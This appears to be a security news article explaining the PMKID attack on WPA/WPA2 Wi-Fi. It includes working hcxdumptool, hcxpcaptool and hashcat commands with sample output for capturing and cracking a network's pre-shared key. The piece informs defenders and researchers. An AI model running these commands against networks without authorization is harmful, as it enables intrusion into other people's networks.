A new method for cracking WPA/WPA2 passphrases lets an attacker obtain a hash derived from a WiFi network's pre-shared key (the PMKID) and crack it offline, without capturing a full client handshake.
The technique was discovered while researching attacks against the recently released WPA3 security standard, which is far harder to attack because its key exchange protocol, Simultaneous Authentication of Equals (SAE), is designed to resist offline dictionary attacks.
WPA3, the Wi-Fi Alliance's successor to WPA2, is intended to protect Wi-Fi networks for the next decade with new capabilities for both personal and enterprise networks.
The researcher found that the attack works without the EAPOL 4-way handshake that earlier WPA/WPA2 attacks depended on.
According to Jens Steube, the developer of the Hashcat password-cracking tool, the new attack is carried out on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.
Steube states that the attack works against all 802.11i/p/q/r networks with roaming functions enabled; how many vendors and routers are affected is not yet clear.
How Does the WPA / WPA2 PMKID Attack Work:
The RSN IE is an optional field in 802.11 management frames; in this attack it is read from the first EAPOL frame sent by the access point.
The RSN IE carries the Pairwise Master Key Identifier (PMKID), which the access point sends as soon as a station tries to authenticate, so it can be captured without any legitimate user being connected.
“Here we can see that the PMKID captured is calculated by HMAC-SHA1, with the PMK as the key and the data part as the concatenation of a fixed string label ‘PMK Name’, the MAC address of the access point, and the station MAC address.”
To use this new attack, you need the following tools:
1. hcxdumptool v4.2.0 or higher
2. hcxtools v4.2.0 or higher
3. hashcat v4.2.0 or higher
Run hcxdumptool to request the PMKID from the AP and dump the received frame to a file in pcapng format:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
The output looks like this:
start capturing (stop with ctrl+c)
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
Then run hcxpcaptool to convert the captured data from pcapng format into a hash format that hashcat accepts:
$ ./hcxpcaptool -z test.16800 test.pcapng
The written file contains one line per captured PMKID, split into four hex-encoded columns separated by '*':
PMKID * MAC AP * MAC Station * ESSID
While not required, the researcher recommends using the options -E, -I and -U with hcxpcaptool. The resulting files can be fed to hashcat as wordlists and typically produce good results.
-E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
-I retrieve identities from WiFi-traffic
-U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
Finally, run hashcat with the new hash mode 16800 (WPA-PMKID-PBKDF2); as with any other hash type, a mask or wordlist attack can be used:
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Hashcat then cracks the WPA-PMKID-PBKDF2 hash and recovers the pre-shared key.
With previously available WiFi attacks, the attacker had to wait until a legitimate user connected to the target network, capture the four-way handshake, and crack the key from it.
The new attack only requires the attacker to attempt authentication to the wireless network in order to obtain the PMKID.
This makes obtaining the hash that embeds the pre-shared key much easier; cracking that hash afterwards is no easier than before, since the same PBKDF2-derived key must still be brute-forced and the difficulty depends on the complexity of the passphrase.